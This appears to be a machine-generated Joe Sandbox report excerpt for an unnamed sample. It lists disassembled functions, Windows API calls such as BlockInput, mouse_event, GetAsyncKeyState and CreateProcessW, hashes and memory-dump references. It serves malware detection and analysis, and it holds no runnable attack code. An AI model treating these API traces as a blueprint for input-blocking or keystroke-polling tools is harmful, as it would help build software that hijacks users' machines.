Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: ef021f1ff196e3c7308b0c8cf17cf7e950577a10168e568549d0bb02e297acf7
Instruction ID: 4047a2a35da57c0f3d44362528206bb4ce788b5bd3b8a33432399bfe823afc29
Opcode Fuzzy Hash: ef021f1ff196e3c7308b0c8cf17cf7e950577a10168e568549d0bb02e297acf7
Instruction Fuzzy Hash: 00113A31204219BFFB2A1B2CCC45FB93714EB41B20F248315FA227A1E2CAA48D80D275

Function 00DFE769 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00DAB155: GetWindowLongW.USER32(?,000000EB), ref: 00DAB166

CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00DFE7AF

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$CallLongProc
String ID:
API String ID: 4084987330-0
Opcode ID: 2ed21a3523cf3b38c1b34b8821cc9772e60a35197a70fd16de253bfe081bad1b
Instruction ID: b2bb3ed231c593422775bfde7044106a64defffd696ab4bc54c1d6d4d69e9add
Opcode Fuzzy Hash: 2ed21a3523cf3b38c1b34b8821cc9772e60a35197a70fd16de253bfe081bad1b
Instruction Fuzzy Hash: AFF04F3110410CFFCF19AF55EC40DB93BA6EB04321B058554FE659A2B1C732DD60EB60

Function 00DFEA4E Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

Part of subcall function 00DAB736: GetCursorPos.USER32(000000FF), ref: 00DAB749
Part of subcall function 00DAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00DAB766
Part of subcall function 00DAB736: GetAsyncKeyState.USER32(00000001), ref: 00DAB78B
Part of subcall function 00DAB736: GetAsyncKeyState.USER32(00000002), ref: 00DAB799

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00E0F417,?,?,?,?,?,00000001,?), ref: 00DFEA9C

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: d11f291d2a0d86ac934706074c7dd7451d22148587acbb96ab4f88bce085d01c
Instruction ID: cb873362d6f705160606833f07a1e4e04e716cbbf0308bcd4d1bdc0918941cde
Opcode Fuzzy Hash: d11f291d2a0d86ac934706074c7dd7451d22148587acbb96ab4f88bce085d01c
Instruction Fuzzy Hash: F4F0A731100329ABDB186F19CC06EBE3F61FB01755F044015F9162A1A1D776D865DBF1

Function 00DAB7F2 Relevance: 1.5, APIs: 1, Instructions: 28nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00DAAF40,?,?,?,?,?), ref: 00DAB83B

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 41b8b097b266fcd4defd3780c70419ab455b45c4317dfc89100785d5b2d0cb27
Instruction ID: 85168889115b9796e82aebe18c31d6f74aae3d3670400de608ad20a0819a890c
Opcode Fuzzy Hash: 41b8b097b266fcd4defd3780c70419ab455b45c4317dfc89100785d5b2d0cb27
Instruction Fuzzy Hash: F8F0BE30200209DFDB2C9F19DC91A393BA2FB01361F108629F8625B2A1D731C860DB60

Function 00DE703C Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00DE7057

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: cb9af97ca3d1af1c110153bee8d9f25beabd9c649b4a012d69c5c6ff6fe9da37
Instruction ID: 7611a532977f40c36af5c53944176fb0e3e1c9e7a51b0190237d69e6d5ea47a8
Opcode Fuzzy Hash: cb9af97ca3d1af1c110153bee8d9f25beabd9c649b4a012d69c5c6ff6fe9da37
Instruction Fuzzy Hash: 83E04F363142049FC710EFAAD808E96F7ECEF98760F00C42AFA45D7251DAB0E8049BB0

Function 00DFF3DA Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00DFF41A

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: ba11d518ff2c94501f9e3c4befd4395c1fbce0f233063a3f686638d26c29826a
Instruction ID: 1731020b1061ede6abf53c639ee6f9f4457ab1f0a24fc009e0232a4cb027fd07
Opcode Fuzzy Hash: ba11d518ff2c94501f9e3c4befd4395c1fbce0f233063a3f686638d26c29826a
Instruction Fuzzy Hash: 92F0ED31200388AFCB20DF18CC05FD63BA5FB05320F088458FA21672E1CB706820D760

Function 00DD7DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00DD7DF8

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: c457ec12f0881b9294ce59ee16a4f9f19792684e8fc2302a89ad92bdf55d2581
Instruction ID: b257809fa66817d65cbd2ba71fe6604e11b8fe4df060a711f98df66ef2fe2988
Opcode Fuzzy Hash: c457ec12f0881b9294ce59ee16a4f9f19792684e8fc2302a89ad92bdf55d2581
Instruction Fuzzy Hash: 41D05EA016C206F9FD180B609C2FF7A010BEB00780FE882CBB481C62C1FC94A8085034

Function 00DAAC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00DAACC7

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: faff117ead7fd5be4f0432ca4339834ec09952ae78990b9f150b6f19cd42e2f5
Instruction ID: aa1afc135e7e6ff0cc292b072d8b25b8ee1681c12e3b7f86123e91ad2c77cfdf
Opcode Fuzzy Hash: faff117ead7fd5be4f0432ca4339834ec09952ae78990b9f150b6f19cd42e2f5
Instruction Fuzzy Hash: C2E0EC35144208FFCF19AF95DC52F683B26FB49354F108458FA155B2A1CB33A526EB61

Function 00DFF425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00E0F3D4,?,?,?,?,?,?), ref: 00DFF450

Part of subcall function 00DFE13E: _memset.LIBCMT ref: 00DFE14D
Part of subcall function 00DFE13E: _memset.LIBCMT ref: 00DFE15C
Part of subcall function 00DFE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E53EE0,00E53F24), ref: 00DFE18B
Part of subcall function 00DFE13E: CloseHandle.KERNEL32 ref: 00DFE19D

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 2364484715-0
Opcode ID: 4095b4f7239bd355e580b98cc6b9dbb7c14d11b760a95c93c03d14b79e10dbf3
Instruction ID: 3fed8c6fb0cf6e4ae08c5f6824c5a17b53f1581cc4fba14ee6419780db485b06
Opcode Fuzzy Hash: 4095b4f7239bd355e580b98cc6b9dbb7c14d11b760a95c93c03d14b79e10dbf3
Instruction Fuzzy Hash: BDE01231100208DFCB11AF09DC05EAA37A2FB08340F068050FA00672B2C731A960EF60

Function 00DFF3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 00DFF3D0

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 468ee68c45bd12d562253e873e29d561188057a19afd3aac8dc62c688d8ea39e
Instruction ID: d020c5df4b95239b7625c7fdc5d0cc55019c1d8f138fba5094ceacc5fd5dce27
Opcode Fuzzy Hash: 468ee68c45bd12d562253e873e29d561188057a19afd3aac8dc62c688d8ea39e
Instruction Fuzzy Hash: A4E0E23420420CEFCB01DF89D845E8A3BA5FB1A350F004094FD048B262C772A824EBA1

Function 00DFF37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 00DFF3A1

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: f05c362c27135f3a4c6e8251c926442121fa6766743d32cb7dc6d563c7ee95f8
Instruction ID: 31baff64d44f0568e537d442fcdfa6c4023d2b3aa4bddfc00caa3ad1fb417deb
Opcode Fuzzy Hash: f05c362c27135f3a4c6e8251c926442121fa6766743d32cb7dc6d563c7ee95f8
Instruction Fuzzy Hash: B8E0E23420420CEFCB01DF89DC45E8A3BA5FB1A350F004094FD049B261C772A820DB61

Function 00DAB845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E

Part of subcall function 00DAB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DAB85B), ref: 00DAB926
Part of subcall function 00DAB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00DAB85B,00000000,?,?,00DAAF1E,?,?), ref: 00DAB9BD

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00DAAF1E,?,?), ref: 00DAB864

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: 9e93d5ca640f2311f55186419ff1aac04fb419af88a873acd0296923b5ba5d80
Instruction ID: 1ae091d2a77917b89b0cde3a8220a76c579f016a1690b935a51b8b3b8c03486b
Opcode Fuzzy Hash: 9e93d5ca640f2311f55186419ff1aac04fb419af88a873acd0296923b5ba5d80
Instruction Fuzzy Hash: 9FD0127118430CBBDB142B65DC07F493A1EEB41751F408421FA05791E2CB71A4119575

Function 00DB8E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00DB8E1F

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 26234937167d80fb002ab23861434779fe8665c4c2c54cbe5bbfdbfc86de6389
Instruction ID: 8f08f9bfb186e752e1da7c4370db3339a58c1d293327047232f4e9d4e00b4be9
Opcode Fuzzy Hash: 26234937167d80fb002ab23861434779fe8665c4c2c54cbe5bbfdbfc86de6389
Instruction Fuzzy Hash: 39A0123000450CAB8A001F52EC044847F5CD7041607008010F41C00021C73354104581

Function 00DBA937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00DB6AE9,00E467D8,00000014), ref: 00DBA937

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 2d6a61b28bbae5dd79838aaa2373fe7eaa226b356f4cdae3ae77d19fe6f078ec
Instruction ID: fc9e54bfc74fb7664c5080b1ccdf00db31fca28e1937a29c2fe2c1b0e3d1c11b
Opcode Fuzzy Hash: 2d6a61b28bbae5dd79838aaa2373fe7eaa226b356f4cdae3ae77d19fe6f078ec
Instruction Fuzzy Hash: 4BB012F07032024FD70C4F3EAC5419E39D457C9202301803D7403D2561DB308414DF00

Function 00DB0EC4 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 12b2a56b32ef20891bbcc0aeb869a23d039ab0495035eb56bec8b3fde41ba211
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: E4C1AF762052A389DF2D463AC4344BFBEA15EA27B131E476DE8B3CB4C4EE24D564D630

Function 00DB12F9 Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: 3a8938ad709f015789667b35e442b63f4441d90ef4032d102d9a91026f3f3a6d
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 37C1A1762052A38ADF2D463AC4344BFBFA15AA27B131E476DD8B3CB5C4EE24D524D630

Function 00DB0A8F Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 1e03a77b455dbc9c8a83d048c201351c0fc255e0618a373ab1ff64e76d282d7b
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: F5C190722052938ADF2D463A84344BFFEA15AA27B531E4B6DE4B3CB4D4EE24D524D630

Function 00DB0677 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
